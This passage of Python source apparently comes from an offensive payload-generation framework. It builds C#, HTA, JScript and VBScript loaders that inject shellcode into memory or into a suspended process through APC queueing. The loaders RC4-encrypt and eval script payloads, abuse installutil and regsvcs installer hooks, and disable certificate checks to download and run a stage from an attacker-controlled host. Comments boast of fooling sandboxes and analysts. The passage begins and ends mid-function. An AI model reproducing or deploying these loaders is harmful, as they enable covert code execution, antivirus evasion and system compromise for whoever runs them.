y[8], y[9], y[10], y[11], y[12], y[13], y[14], y[15], y[16]) payload_code2, num_tabs_required = gamemaker.senecas_games(self) payload_code = payload_code + payload_code2 num_tabs_required += 2 if self.required_options["INJECT_METHOD"][0].lower() == "virtual": payload_code += '\t' * num_tabs_required + "byte[] %s = {%s};" % ( bytearrayName, Shellcode) payload_code += '\t' * num_tabs_required + "UInt32 %s = VirtualAlloc(0, (UInt32)%s.Length, 0x1000, 0x40);\n" % ( funcAddrName, bytearrayName) payload_code += '\t' * num_tabs_required + "Marshal.Copy(%s, 0, (IntPtr)(%s), %s.Length);\n" % ( bytearrayName, funcAddrName, bytearrayName) payload_code += '\t' * num_tabs_required + "IntPtr %s = IntPtr.Zero; UInt32 %s = 0; IntPtr %s = IntPtr.Zero;\n" % ( hThreadName, threadIdName, pinfoName) payload_code += '\t' * num_tabs_required + "%s = CreateThread(0, 0, %s, %s, 0, ref %s);\n" % ( hThreadName, funcAddrName, pinfoName, threadIdName) payload_code += '\t' * num_tabs_required + "WaitForSingleObject(%s, 0xFFFFFFFF);\n" % ( hThreadName) elif self.required_options["INJECT_METHOD"][0].lower() == "heap": rand_heap = bypass_helpers.randomString() rand_ptr = bypass_helpers.randomString() rand_var = bypass_helpers.randomString() payload_code += '\t' * num_tabs_required + "byte[] %s = {%s};\n" % ( bytearrayName, Shellcode) payload_code += '\t' * num_tabs_required + 'UInt32 {} = HeapCreate(0x00040000, (UInt32){}.Length, 0);\n'.format( rand_heap, bytearrayName) payload_code += '\t' * num_tabs_required + 'UInt32 {} = HeapAlloc({}, 0x00000008, (UInt32){}.Length);\n'.format( rand_ptr, rand_heap, bytearrayName) payload_code += '\t' * num_tabs_required + 'RtlMoveMemory({}, {}, (UInt32){}.Length);\n'.format( rand_ptr, bytearrayName, bytearrayName) payload_code += '\t' * num_tabs_required + 'UInt32 {} = 0;\n'.format( rand_var) payload_code += '\t' * num_tabs_required + 'IntPtr {} = CreateThread(0, 0, {}, IntPtr.Zero, 0, ref {});\n'.format( hThreadName, rand_ptr, rand_var) payload_code += '\t' * num_tabs_required + 'WaitForSingleObject({}, 0xFFFFFFFF);\n'.format( hThreadName) while (num_tabs_required != 0): if num_tabs_required == 2: # return true for the msbuild Execute() function payload_code += "\nreturn true;" payload_code += '\t' * num_tabs_required + '}' num_tabs_required -= 1 else: payload_code += '\t' * num_tabs_required + '}' num_tabs_required -= 1 payload_code += "\n\t\t\t\t]]>\n\t\t\t</Code>\n\t\t</Task>\n\t</UsingTask>\n</Project>" payload_code = msbuild_header + payload_code self.payload_source_code = payload_code return
def generate(self): # Generate the shellcode if not self.cli_shellcode: Shellcode = self.shellcode.generate(self.cli_opts) if self.shellcode.msfvenompayload: self.payload_type = self.shellcode.msfvenompayload elif self.shellcode.payload_choice: self.payload_type = self.shellcode.payload_choice self.shellcode.payload_choice = '' # assume custom shellcode else: self.payload_type = 'custom' else: Shellcode = self.cli_shellcode Shellcode = "0" + ",0".join(Shellcode.split("\\")[1:]) Shellcode = base64.b64encode(bytes(Shellcode, 'latin-1')).decode('ascii') # randomize all our variables, yo x86 = bypass_helpers.randomString() # generate a random key key = bypass_helpers.randomString().lower() # figure out a sane way to generate two separate instances of shellcode within the framework # currently, only 32 bit payload shellcode will work payload_code, num_tabs_required = gamemaker.senecas_games(self) code = "" num_tabs = 0 bytearrayName = bypass_helpers.randomString() className = "HelloWorld" processMigrate = "Print" processMigratex86 = bypass_helpers.randomString() processMigrateProcessPath = bypass_helpers.randomString() processMigrateShellcode = bypass_helpers.randomString() shellCode = bypass_helpers.randomString() startupInfo = bypass_helpers.randomString() processInformation = bypass_helpers.randomString() success = bypass_helpers.randomString() resultPtr = bypass_helpers.randomString() bytesWritten = bypass_helpers.randomString() resultBool = bypass_helpers.randomString() oldProtect = bypass_helpers.randomString() targetProc = bypass_helpers.randomString() currentThreads = bypass_helpers.randomString() sht = bypass_helpers.randomString() ptr = bypass_helpers.randomString() ThreadHandle = bypass_helpers.randomString() code += "using System;\nusing System.Diagnostics;\nusing System.Reflection;\nusing System.Runtime.InteropServices;\nusing System.Linq;\n\n" code += "[ComVisible(true)]\n" code += "public class {0}\n".format(className) code += "{\n" num_tabs += 1 code += "\t" * num_tabs + "public {0}()\n".format(className) code += "\t" * num_tabs + "{\n\n" code += "\t" * num_tabs + "}\n\n" code += "\t" * num_tabs + "public void {0}(string {1})\n".format( processMigrate, processMigratex86) code += "\t" * num_tabs + "{\n" code += "\t" * num_tabs + payload_code code += "\t" * num_tabs + "string {0};\n".format( processMigrateShellcode) code += "\t" * num_tabs + "string {0};\n".format( processMigrateProcessPath) code += "\t" * num_tabs + "\t{0} = {1};\n".format( processMigrateShellcode, processMigratex86) code += "\t" * num_tabs + "\t{0} = \"{1}\";\n\n".format( processMigrateProcessPath, "C:\\\\Windows\\\\System32\\\\" + self.required_options["PROCESS"][0]) code += '\t' * num_tabs + "\tstring %s = System.Text.ASCIIEncoding.ASCII.GetString(Convert.FromBase64String(%s));\n" % ( bytearrayName, processMigrateShellcode) code += '\t' * num_tabs + "\tstring[] chars = %s.Split(',').ToArray();\n" % ( bytearrayName) code += '\t' * num_tabs + "\tbyte[] %s = new byte[chars.Length];\n" % ( shellCode) code += '\t' * num_tabs + \ "\tfor (int i = 0; i < chars.Length; ++i) { %s[i] = Convert.ToByte(chars[i], 16); }\n" % ( shellCode) code += "\t" * num_tabs + "\tSTARTUPINFO {0} = new STARTUPINFO();\n".format( startupInfo) code += "\t" * num_tabs + "\tPROCESS_INFORMATION {0} = new PROCESS_INFORMATION();\n".format( processInformation) code += "\t" * num_tabs + "\tbool {0} = CreateProcess({1}, null, IntPtr.Zero, IntPtr.Zero, false, ProcessCreationFlags.CREATE_SUSPENDED | ProcessCreationFlags.CREATE_NO_WINDOW , IntPtr.Zero, null, ref {2}, out {3});\n".format( success, processMigrateProcessPath, startupInfo, processInformation) code += "\t" * num_tabs + "\tIntPtr {0} = VirtualAllocEx({1}.hProcess, IntPtr.Zero, {2}.Length, MEM_COMMIT, PAGE_READWRITE);\n".format( resultPtr, processInformation, shellCode) code += "\t" * num_tabs + "\tIntPtr {0} = IntPtr.Zero;\n".format( bytesWritten) code += "\t" * num_tabs + "\tbool {0} = WriteProcessMemory({1}.hProcess,{2},{3},{4}.Length, out {5});\n".format( resultBool, processInformation, resultPtr, shellCode, shellCode, bytesWritten) code += "\t" * num_tabs + "\tuint {0} = 0;\n".format(oldProtect) code += "\t" * num_tabs + "\t{0} = VirtualProtectEx({1}.hProcess, {2}, {3}.Length, PAGE_EXECUTE_READ, out {4} );\n".format( resultBool, processInformation, resultPtr, shellCode, oldProtect) code += "\t" * num_tabs + "\tProcess {0} = Process.GetProcessById((int){1}.dwProcessId);\n".format( targetProc, processInformation) code += "\t" * num_tabs + "\tProcessThreadCollection {0} = {1}.Threads;\n".format( currentThreads, targetProc) code += "\t" * num_tabs + "\tIntPtr {0} = OpenThread(ThreadAccess.SET_CONTEXT, false, {1}[0].Id);\n".format( sht, currentThreads) code += "\t" * num_tabs + "\tIntPtr {0} = QueueUserAPC({1},{2},IntPtr.Zero);\n".format( ptr, resultPtr, sht) code += "\t" * num_tabs + "\tIntPtr {0} = {1}.hThread;\n".format( ThreadHandle, processInformation) code += "\t" * num_tabs + "\tResumeThread({0});\n".format(ThreadHandle) code += "\t" * num_tabs + "}\n" code += """ private static UInt32 MEM_COMMIT = 0x1000; private static UInt32 PAGE_EXECUTE_READ = 0x20; private static UInt32 PAGE_READWRITE = 0x04; [Flags] public enum ProcessAccessFlags : uint { All = 0x001F0FFF, Terminate = 0x00000001, CreateThread = 0x00000002, VirtualMemoryOperation = 0x00000008, VirtualMemoryRead = 0x00000010, VirtualMemoryWrite = 0x00000020, DuplicateHandle = 0x00000040, CreateProcess = 0x000000080, SetQuota = 0x00000100, SetInformation = 0x00000200, QueryInformation = 0x00000400, QueryLimitedInformation = 0x00001000, Synchronize = 0x00100000 } [Flags] public enum ProcessCreationFlags : uint { ZERO_FLAG = 0x00000000, CREATE_BREAKAWAY_FROM_JOB = 0x01000000, CREATE_DEFAULT_ERROR_MODE = 0x04000000, CREATE_NEW_CONSOLE = 0x00000010, CREATE_NEW_PROCESS_GROUP = 0x00000200, CREATE_NO_WINDOW = 0x08000000, CREATE_PROTECTED_PROCESS = 0x00040000, CREATE_PRESERVE_CODE_AUTHZ_LEVEL = 0x02000000, CREATE_SEPARATE_WOW_VDM = 0x00001000, CREATE_SHARED_WOW_VDM = 0x00001000, CREATE_SUSPENDED = 0x00000004, CREATE_UNICODE_ENVIRONMENT = 0x00000400, DEBUG_ONLY_THIS_PROCESS = 0x00000002, DEBUG_PROCESS = 0x00000001, DETACHED_PROCESS = 0x00000008, EXTENDED_STARTUPINFO_PRESENT = 0x00080000, INHERIT_PARENT_AFFINITY = 0x00010000 } public struct PROCESS_INFORMATION { public IntPtr hProcess; public IntPtr hThread; public uint dwProcessId; public uint dwThreadId; } public struct STARTUPINFO { public uint cb; public string lpReserved; public string lpDesktop; public string lpTitle; public uint dwX; public uint dwY; public uint dwXSize; public uint dwYSize; public uint dwXCountChars; public uint dwYCountChars; public uint dwFillAttribute; public uint dwFlags; public short wShowWindow; public short cbReserved2; public IntPtr lpReserved2; public IntPtr hStdInput; public IntPtr hStdOutput; public IntPtr hStdError; } [Flags] public enum ThreadAccess : int { TERMINATE = (0x0001) , SUSPEND_RESUME = (0x0002) , GET_CONTEXT = (0x0008) , SET_CONTEXT = (0x0010) , SET_INFORMATION = (0x0020) , QUERY_INFORMATION = (0x0040) , SET_THREAD_TOKEN = (0x0080) , IMPERSONATE = (0x0100) , DIRECT_IMPERSONATION = (0x0200) } [DllImport("kernel32.dll", SetLastError = true)] public static extern IntPtr OpenThread(ThreadAccess dwDesiredAccess, bool bInheritHandle, int dwThreadId); [DllImport("kernel32.dll",SetLastError = true)] public static extern bool WriteProcessMemory( IntPtr hProcess, IntPtr lpBaseAddress, byte[] lpBuffer, int nSize, out IntPtr lpNumberOfBytesWritten); [DllImport("kernel32.dll")] public static extern IntPtr QueueUserAPC(IntPtr pfnAPC, IntPtr hThread, IntPtr dwData); [DllImport("kernel32.dll", SetLastError = true )] public static extern IntPtr VirtualAllocEx(IntPtr hProcess, IntPtr lpAddress, Int32 dwSize, UInt32 flAllocationType, UInt32 flProtect); [DllImport("kernel32.dll")] static extern bool VirtualProtectEx(IntPtr hProcess, IntPtr lpAddress, int dwSize, uint flNewProtect, out uint lpflOldProtect); [DllImport("kernel32.dll")] public static extern bool CreateProcess(string lpApplicationName, string lpCommandLine, IntPtr lpProcessAttributes, IntPtr lpThreadAttributes, bool bInheritHandles, ProcessCreationFlags dwCreationFlags, IntPtr lpEnvironment, string lpCurrentDirectory, ref STARTUPINFO lpStartupInfo, out PROCESS_INFORMATION lpProcessInformation); [DllImport("kernel32.dll")] public static extern uint ResumeThread(IntPtr hThread); [DllImport("kernel32.dll")] public static extern uint SuspendThread(IntPtr hThread); } """ with open("/tmp/hta_source.cs", "w") as f: f.write(code) if self.required_options["SCRIPT_TYPE"][0].lower() == "jscript": with open("/tmp/migrate.js", "w") as ff: ff.write("o.Print({0});".format(x86)) os.system( "mcs -platform:x86 -target:library -sdk:2 {0} -out:/tmp/dotnettojscript.dll" .format("/tmp/hta_source.cs")) os.system( "WINEPREFIX=/root/.greatsct wine /usr/share/greatsct/DotNetToJScript.exe /tmp/dotnettojscript.dll -ver auto -c HelloWorld -o {0} -s /tmp/migrate.js" .format("/tmp/greatsct.js")) with open("/tmp/greatsct.js", 'r') as original: data = original.read() with open("/tmp/greatsct.js", 'w') as modified: modified.write( "<script language=\"JScript\">\n\nvar {0} = \"{1}\";\n\n". format(x86, Shellcode) + data + "\nwindow.close();\n</script>") with open("/tmp/greatsct.js", "r") as js: payload = js.read() if self.required_options["ENCRYPTION"][0].lower() != "x": encrypted_payload = encryption.rc4(key, payload) encrypted_payload = base64.standard_b64encode( bytes(encrypted_payload, "latin-1")).decode("ascii") # rc4 = bypass_helpers.randomString() # jskey = bypass_helpers.randomString() # string = bypass_helpers.randomString() # s = bypass_helpers.randomString() # j = bypass_helpers.randomString() # x = bypass_helpers.randomString() # TODO obfuscate source_code = "<script language = \"javascript\">" # Based on code from https://github.com/mdsecactivebreach/SharpShooter source_code += """rc4 = function(key, str) { var s = [], j = 0, x, res = ''; for (var i = 0; i < 256; i++) { s[i] = i; } for (i = 0; i < 256; i++) { j = (j + s[i] + key.charCodeAt(i % key.length)) % 256; x = s[i]; s[i] = s[j]; s[j] = x; } i = 0; j = 0; for (var y = 0; y < str.length; y++) { i = (i + 1) % 256; j = (j + s[i]) % 256; x = s[i]; s[i] = s[j]; s[j] = x; res += String.fromCharCode(str.charCodeAt(y) ^ s[(s[i] + s[j]) % 256]); } return res; } decodeBase64 = function(s) { var e={},i,b=0,c,x,l=0,a,r='',w=String.fromCharCode,L=s.length; var A="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"; for(i=0;i<64;i++){e[A.charAt(i)]=i;} for(x=0;x<L;x++){ c=e[s.charAt(x)];b=(b<<6)+c;l+=6; while(l>=8){((a=(b>>>(l-=8))&0xff)||(x<(L-2)))&&(r+=w(a));} } return r; };""" source_code += '\nvar b64block = "{0}";'.format( encrypted_payload) source_code += "\nvar decoded = decodeBase64(b64block);" source_code += "\nvar plain = rc4(\"{0}\", decoded);".format( key) source_code += "\neval(plain);" source_code += "\n</script>" else: source_code = payload elif self.required_options["SCRIPT_TYPE"][0].lower() == "vbscript": # do stuff with open("/tmp/migrate.vbs", "w") as ff: ff.write("o.Print {0}".format(x86)) os.system( "mcs -platform:x86 -target:library -sdk:2 {0} -out:/tmp/dotnettojscript.dll" .format("/tmp/hta_source.cs")) os.system( "WINEPREFIX=/root/.greatsct wine /usr/share/greatsct/DotNetToJScript.exe /tmp/dotnettojscript.dll -ver auto -l vbscript -c HelloWorld -o {0} -s /tmp/migrate.vbs" .format("/tmp/greatsct.vbs")) with open("/tmp/greatsct.vbs", 'r') as original: data = original.read() with open("/tmp/greatsct.vbs", 'w') as modified: modified.write( "<script language=\"VBScript\">\n\n\nDim {0} : {0} = \"{1}\"\n\n" .format(x86, Shellcode) + data + "\nSelf.Close()\n</script>") with open("/tmp/greatsct.vbs", "r") as vbs: payload = vbs.read() if self.required_options["ENCRYPTION"][0].lower() != "x": encrypted_payload = encryption.rc4(key, payload) encrypted_payload = base64.standard_b64encode( bytes(encrypted_payload, "latin-1")).decode("ascii") # Based on code from https://github.com/mdsecactivebreach/SharpShooter # TODO: obfuscate source_code = "" source_code += """rc4 = function(key, str) { var s = [], j = 0, x, res = ''; for (var i = 0; i < 256; i++) { s[i] = i; } for (i = 0; i < 256; i++) { j = (j + s[i] + key.charCodeAt(i % key.length)) % 256; x = s[i]; s[i] = s[j]; s[j] = x; } i = 0; j = 0; for (var y = 0; y < str.length; y++) { i = (i + 1) % 256; j = (j + s[i]) % 256; x = s[i]; s[i] = s[j]; s[j] = x; res += String.fromCharCode(str.charCodeAt(y) ^ s[(s[i] + s[j]) % 256]); } return res; } decodeBase64 = function(s) { var e={},i,b=0,c,x,l=0,a,r='',w=String.fromCharCode,L=s.length; var A="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"; for(i=0;i<64;i++){e[A.charAt(i)]=i;} for(x=0;x<L;x++){ c=e[s.charAt(x)];b=(b<<6)+c;l+=6; while(l>=8){((a=(b>>>(l-=8))&0xff)||(x<(L-2)))&&(r+=w(a));} } return r; };""" source_code += '\nvar b64block = "{0}";'.format( encrypted_payload) source_code += "\nvar decoded = decodeBase64(b64block);" source_code += "\nvar plain = rc4(\"{0}\", decoded);".format( key) source_code += "\n</script>" source_code += "\n<script language = \"vbscript\">" source_code += "\nExecute plain" source_code += "\nself.close" source_code += "</script>" source_code = "<script language = \"javascript\">\n" + source_code else: source_code = payload else: print("Script type not supported") self.payload_source_code = source_code return
def generate(self): with open(self.required_options["SCRIPT"][0], "r") as f: the_script = f.read() if self.required_options["FUNCTION"][0].lower() != "x": # Append FUNCTION to end of script the_script += "\n{0}".format(self.required_options["FUNCTION"][0]) FunctionName = self.required_options["FUNCTION"][0] if self.required_options["OBFUSCATION"][0].lower() != "x": if self.required_options["OBFUSCATION"][0].lower() == "binary": the_script = invoke_obfuscation.binaryEncode(the_script) elif self.required_options["OBFUSCATION"][0].lower() == "ascii": the_script = invoke_obfuscation.asciiEncode(the_script) else: the_script = invoke_obfuscation.binaryEncode(the_script) # randomize all our variable names, yo' className = bypass_helpers.randomString() classNameTwo = bypass_helpers.randomString() namespace = bypass_helpers.randomString() key = bypass_helpers.randomString() execName = bypass_helpers.randomString() num_tabs_required = 0 # get random variables for the API imports r = [bypass_helpers.randomString() for x in range(16)] y = [bypass_helpers.randomString() for x in range(17)] #required syntax at the beginning of any/all payloads payload_code = "using System; using System.Net; using System.Net.Sockets; using System.Linq; using System.Threading; using System.EnterpriseServices; using System.Runtime.InteropServices; using System.Windows.Forms;using System.Reflection; using System.Collections.ObjectModel; using System.Management.Automation; using System.Management.Automation.Runspaces; using System.Text;\n" payload_code += "namespace {0}\n {{".format(namespace) payload_code += "\n\tpublic class {0} : ServicedComponent {{\n".format( className) # placeholder for legitimate C# program # lets add a message box to throw offf sandbox heuristics and analysts :) payload_code += '\n\t\tpublic {0}() {{ Console.WriteLine("doge"); }}\n'.format( className) payload_code += "\n\t\t[ComRegisterFunction]" payload_code += "\n\t\tpublic static void RegisterClass ( string {0} )\n\t\t{{\n".format( key) payload_code += "\t\t\t{0}.{1}();\n\t\t}}\n".format( classNameTwo, execName) payload_code += "\n[ComUnregisterFunction]" payload_code += "\n\t\tpublic static void UnRegisterClass ( string {0} )\n\t\t{{\n".format( key) payload_code += "\t\t\t{0}.{1}();\n\t\t}}\n\t}}\n".format( classNameTwo, execName) payload_code += "\n\tpublic class {0}\n\t{{".format(classNameTwo) payload_code += "\n\t\tpublic static void {0}() {{\n".format(execName) payload_code2, num_tabs_required = gamemaker.senecas_games(self) payload_code = payload_code + payload_code2 encodedScript = bypass_helpers.randomString() encodedScriptContents = base64.b64encode(bytes( the_script, 'latin-1')).decode('ascii') powershellCmd = bypass_helpers.randomString() data = bypass_helpers.randomString() command = bypass_helpers.randomString() RunPSCommand = bypass_helpers.randomString() cmd = bypass_helpers.randomString() runspace = bypass_helpers.randomString() scriptInvoker = bypass_helpers.randomString() pipeline = bypass_helpers.randomString() results = bypass_helpers.randomString() stringBuilder = bypass_helpers.randomString() obj = bypass_helpers.randomString() RunPSFile = bypass_helpers.randomString() script = bypass_helpers.randomString() ps = bypass_helpers.randomString() e = bypass_helpers.randomString() payload_code += """string {0} = "{1}"; string {2} = ""; byte[] {3} = Convert.FromBase64String({0}); string {4} = Encoding.ASCII.GetString({3}); {2} = {4}; try {{ Console.Write({5}({2})); }} catch (Exception {6}) {{ Console.Write({6}.Message); }}""".format(encodedScript, encodedScriptContents, powershellCmd, data, command, RunPSCommand, e) while (num_tabs_required != 0): payload_code += '\t' * num_tabs_required + '}' num_tabs_required -= 1 payload_code += """}} public static string {0}(string {1}) {{ Runspace {2} = RunspaceFactory.CreateRunspace(); {2}.Open(); RunspaceInvoke {3} = new RunspaceInvoke({2}); Pipeline {4} = {2}.CreatePipeline(); {4}.Commands.AddScript({1}); {4}.Commands.Add("Out-String"); Collection<PSObject> {5} = {4}.Invoke(); {2}.Close(); StringBuilder {6} = new StringBuilder(); foreach (PSObject {7} in {5}) {{ {6}.Append({7}); }} return {6}.ToString().Trim(); }} public static void {8}(string {9}) {{ PowerShell {10} = PowerShell.Create(); {10}.AddScript({9}).Invoke(); }}""".format(RunPSCommand, cmd, runspace, scriptInvoker, pipeline, results, stringBuilder, obj, RunPSFile, script, ps) payload_code += "\n}" * 2 self.payload_source_code = payload_code return
def generate(self): # get random variables for the API imports r = [bypass_helpers.randomString() for x in range(16)] y = [bypass_helpers.randomString() for x in range(17)] # installutil random class variables className = bypass_helpers.randomString() classNameTwo = bypass_helpers.randomString() classNameThree = bypass_helpers.randomString() execName = bypass_helpers.randomString() savedStateName = bypass_helpers.randomString() #required syntax at the beginning of any/all payloads payload_code = "using System; using System.Net; using System.Linq; using System.Net.Sockets; using System.Runtime.InteropServices; using System.Threading; using System.Configuration.Install; using System.Windows.Forms;\n" payload_code += "\tpublic class {0} {{\n".format(className) payload_code += "\t\tpublic static void Main()\n\t\t{\n" # lets add a message box to throw offf sandbox heuristics and analysts :) # there is no decryption routine, troll.level = 9000 # TODO: add a fake decryption function that does nothing and accepts messWithAnalystName as a parameter. payload_code += "\t\t\twhile(true)\n{{ MessageBox.Show(\"doge\"); Console.ReadLine();}}\n" payload_code += "\t\t}\n\t}\n\n" payload_code += "\t[System.ComponentModel.RunInstaller(true)]\n" payload_code += "\tpublic class {0} : System.Configuration.Install.Installer\n\t{{\n".format( classNameTwo) payload_code += "\t\tpublic override void Uninstall(System.Collections.IDictionary {0})\n\t\t{{\n".format( savedStateName) payload_code += "\t\t\t{0}.{1}();\n\t\t}}\n\t}}\n".format( classNameThree, execName) payload_code += "\n\tpublic class {0}\n\t{{".format(classNameThree) if self.required_options["INJECT_METHOD"][0].lower() == "virtual": payload_code += """\t\t[DllImport(\"kernel32\")] private static extern UInt32 VirtualAlloc(UInt32 %s,UInt32 %s, UInt32 %s, UInt32 %s);\n[DllImport(\"kernel32\")]private static extern IntPtr CreateThread(UInt32 %s, UInt32 %s, UInt32 %s,IntPtr %s, UInt32 %s, ref UInt32 %s);\n[DllImport(\"kernel32\")] private static extern UInt32 WaitForSingleObject(IntPtr %s, UInt32 %s);\n""" % ( r[0], r[1], r[2], r[3], r[4], r[5], r[6], r[7], r[8], r[9], r[10], r[11]) elif self.required_options["INJECT_METHOD"][0].lower() == "heap": payload_code += """\t\t[DllImport(\"kernel32\")] private static extern UInt32 HeapCreate(UInt32 %s, UInt32 %s, UInt32 %s); \n[DllImport(\"kernel32\")] private static extern UInt32 HeapAlloc(UInt32 %s, UInt32 %s, UInt32 %s);\n[DllImport(\"kernel32\")] private static extern UInt32 RtlMoveMemory(UInt32 %s, byte[] %s, UInt32 %s);\n[DllImport(\"kernel32\")] private static extern IntPtr CreateThread(UInt32 %s, UInt32 %s, UInt32 %s, IntPtr %s, UInt32 %s, ref UInt32 %s);\n[DllImport(\"kernel32\")] private static extern UInt32 WaitForSingleObject(IntPtr %s, UInt32 %s);""" % ( y[0], y[1], y[2], y[3], y[4], y[5], y[6], y[7], y[8], y[9], y[10], y[11], y[12], y[13], y[14], y[15], y[16]) # code for the randomString() function randomStringName = bypass_helpers.randomString() bufferName = bypass_helpers.randomString() charsName = bypass_helpers.randomString() t = list( "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789") random.shuffle(t) chars = ''.join(t) # logic to turn off certificate validation validateServerCertficateName = bypass_helpers.randomString() payload_code += "private static bool %s(object sender, System.Security.Cryptography.X509Certificates.X509Certificate cert,System.Security.Cryptography.X509Certificates.X509Chain chain,System.Net.Security.SslPolicyErrors sslPolicyErrors) { return true; }\n" % ( validateServerCertficateName) # code for the randomString() method payload_code += "static string %s(Random r, int s) {\n" % ( randomStringName) payload_code += "char[] %s = new char[s];\n" % (bufferName) payload_code += "string %s = \"%s\";\n" % (charsName, chars) payload_code += "for (int i = 0; i < s; i++){ %s[i] = %s[r.Next(%s.Length)];}\n" % ( bufferName, charsName, charsName) payload_code += "return new string(%s);}\n" % (bufferName) # code for the checksum8() function checksum8Name = bypass_helpers.randomString() payload_code += "static bool %s(string s) {return ((s.ToCharArray().Select(x => (int)x).Sum()) %% 0x100 == 92);}\n" % ( checksum8Name) # code fo the genHTTPChecksum() function genHTTPChecksumName = bypass_helpers.randomString() baseStringName = bypass_helpers.randomString() randCharsName = bypass_helpers.randomString() urlName = bypass_helpers.randomString() random.shuffle(t) randChars = ''.join(t) payload_code += "static string %s(Random r) { string %s = \"\";\n" % ( genHTTPChecksumName, baseStringName) payload_code += "for (int i = 0; i < 64; ++i) { %s = %s(r, 3);\n" % ( baseStringName, randomStringName) payload_code += "string %s = new string(\"%s\".ToCharArray().OrderBy(s => (r.Next(2) %% 2) == 0).ToArray());\n" % ( randCharsName, randChars) payload_code += "for (int j = 0; j < %s.Length; ++j) {\n" % ( randCharsName) payload_code += "string %s = %s + %s[j];\n" % (urlName, baseStringName, randCharsName) payload_code += "if (%s(%s)) {return %s;}}} return \"9vXU\";}" % ( checksum8Name, urlName, urlName) # code for getData() function getDataName = bypass_helpers.randomString() strName = bypass_helpers.randomString() webClientName = bypass_helpers.randomString() sName = bypass_helpers.randomString() payload_code += "static byte[] %s(string %s) {\n" % (getDataName, strName) payload_code += "ServicePointManager.ServerCertificateValidationCallback = %s;\n" % ( validateServerCertficateName) payload_code += "WebClient %s = new System.Net.WebClient();\n" % ( webClientName) payload_code += "%s.Headers.Add(\"User-Agent\", \"Mozilla/4.0 (compatible; MSIE 6.1; Windows NT)\");\n" % ( webClientName) payload_code += "%s.Headers.Add(\"Accept\", \"*/*\");\n" % ( webClientName) payload_code += "%s.Headers.Add(\"Accept-Language\", \"en-gb,en;q=0.5\");\n" % ( webClientName) payload_code += "%s.Headers.Add(\"Accept-Charset\", \"ISO-8859-1,utf-8;q=0.7,*;q=0.7\");\n" % ( webClientName) payload_code += "byte[] %s = null;\n" % (sName) payload_code += "try { %s = %s.DownloadData(%s);\n" % ( sName, webClientName, strName) payload_code += "if (%s.Length < 100000) return null;}\n" % (sName) payload_code += "catch (WebException) {}\n" payload_code += "return %s;}\n" % (sName) # code fo the inject() function to inject shellcode injectName = bypass_helpers.randomString() sName = bypass_helpers.randomString() funcAddrName = bypass_helpers.randomString() hThreadName = bypass_helpers.randomString() threadIdName = bypass_helpers.randomString() pinfoName = bypass_helpers.randomString() if self.required_options["INJECT_METHOD"][0].lower() == "virtual": payload_code += "static void %s(byte[] %s) {\n" % (injectName, sName) payload_code += " if (%s != null) {\n" % (sName) payload_code += " UInt32 %s = VirtualAlloc(0, (UInt32)%s.Length, 0x1000, 0x40);\n" % ( funcAddrName, sName) payload_code += " Marshal.Copy(%s, 0, (IntPtr)(%s), %s.Length);\n" % ( sName, funcAddrName, sName) payload_code += " IntPtr %s = IntPtr.Zero;\n" % ( hThreadName) payload_code += " UInt32 %s = 0;\n" % (threadIdName) payload_code += " IntPtr %s = IntPtr.Zero;\n" % (pinfoName) payload_code += " %s = CreateThread(0, 0, %s, %s, 0, ref %s);\n" % ( hThreadName, funcAddrName, pinfoName, threadIdName) payload_code += " WaitForSingleObject(%s, 0xFFFFFFFF); }}\n" % ( hThreadName) elif self.required_options["INJECT_METHOD"][0].lower() == "heap": payload_code += "static void %s(byte[] %s) {\n" % (injectName, sName) payload_code += " if (%s != null) {\n" % (sName) payload_code += ' UInt32 {} = HeapCreate(0x00040000, (UInt32){}.Length, 0);\n'.format( pinfoName, sName) payload_code += ' UInt32 {} = HeapAlloc({}, 0x00000008, (UInt32){}.Length);\n'.format( funcAddrName, pinfoName, sName) payload_code += ' RtlMoveMemory({}, {}, (UInt32){}.Length);\n'.format( funcAddrName, sName, sName) payload_code += ' UInt32 {} = 0;\n'.format(threadIdName) payload_code += ' IntPtr {} = CreateThread(0, 0, {}, IntPtr.Zero, 0, ref {});\n'.format( hThreadName, funcAddrName, threadIdName) payload_code += ' WaitForSingleObject({}, 0xFFFFFFFF);}}}}\n'.format( hThreadName) # code for Main() to launch everything randomName = bypass_helpers.randomString() num_tabs_required = 0 payload_code += "\n\t\tpublic static void {0}() {{\n".format(execName) payload_code2, num_tabs_required = gamemaker.senecas_games(self) payload_code = payload_code + payload_code2 num_tabs_required += 2 payload_code += "Random %s = new Random((int)DateTime.Now.Ticks);\n" % ( randomName) payload_code += "byte[] %s = %s(\"https://%s:%s/\" + %s(%s));\n" % ( sName, getDataName, self.required_options["LHOST"][0], self.required_options["LPORT"][0], genHTTPChecksumName, randomName) payload_code += "%s(%s);\n" % (injectName, sName) while (num_tabs_required != 0): payload_code += '\t' * num_tabs_required + '}' num_tabs_required -= 1 self.payload_source_code = payload_code return
def generate(self): # Generate the shellcode if not self.cli_shellcode: Shellcode = self.shellcode.generate(self.cli_opts) if self.shellcode.msfvenompayload: self.payload_type = self.shellcode.msfvenompayload elif self.shellcode.payload_choice: self.payload_type = self.shellcode.payload_choice self.shellcode.payload_choice = '' # assume custom shellcode else: self.payload_type = 'custom' else: Shellcode = self.cli_shellcode # Base64 encode the shellcode Shellcode = "0" + ",0".join(Shellcode.split("\\")[1:]) # randomize all our variable names, yo' className = bypass_helpers.randomString() classNameTwo = bypass_helpers.randomString() classNameThree = bypass_helpers.randomString() execName = bypass_helpers.randomString() bytearrayName = bypass_helpers.randomString() funcAddrName = bypass_helpers.randomString() savedStateName = bypass_helpers.randomString() messWithAnalystName = bypass_helpers.randomString() shellcodeName = bypass_helpers.randomString() rand_bool = bypass_helpers.randomString() random_out = bypass_helpers.randomString() hThreadName = bypass_helpers.randomString() threadIdName = bypass_helpers.randomString() pinfoName = bypass_helpers.randomString() num_tabs_required = 0 # get random variables for the API imports r = [bypass_helpers.randomString() for x in range(16)] y = [bypass_helpers.randomString() for x in range(17)] #required syntax at the beginning of any/all payloads payload_code = "using System; using System.Net; using System.Linq; using System.Net.Sockets; using System.Runtime.InteropServices; using System.Threading; using System.Configuration.Install; using System.Windows.Forms;\n" payload_code += "\tpublic class {0} {{\n".format(className) payload_code += "\t\tpublic static void Main()\n\t\t{\n" # lets add a message box to throw offf sandbox heuristics and analysts :) # there is no decryption routine, troll.level = 9000 # TODO: add a fake decryption function that does nothing and accepts messWithAnalystName as a parameter. payload_code += 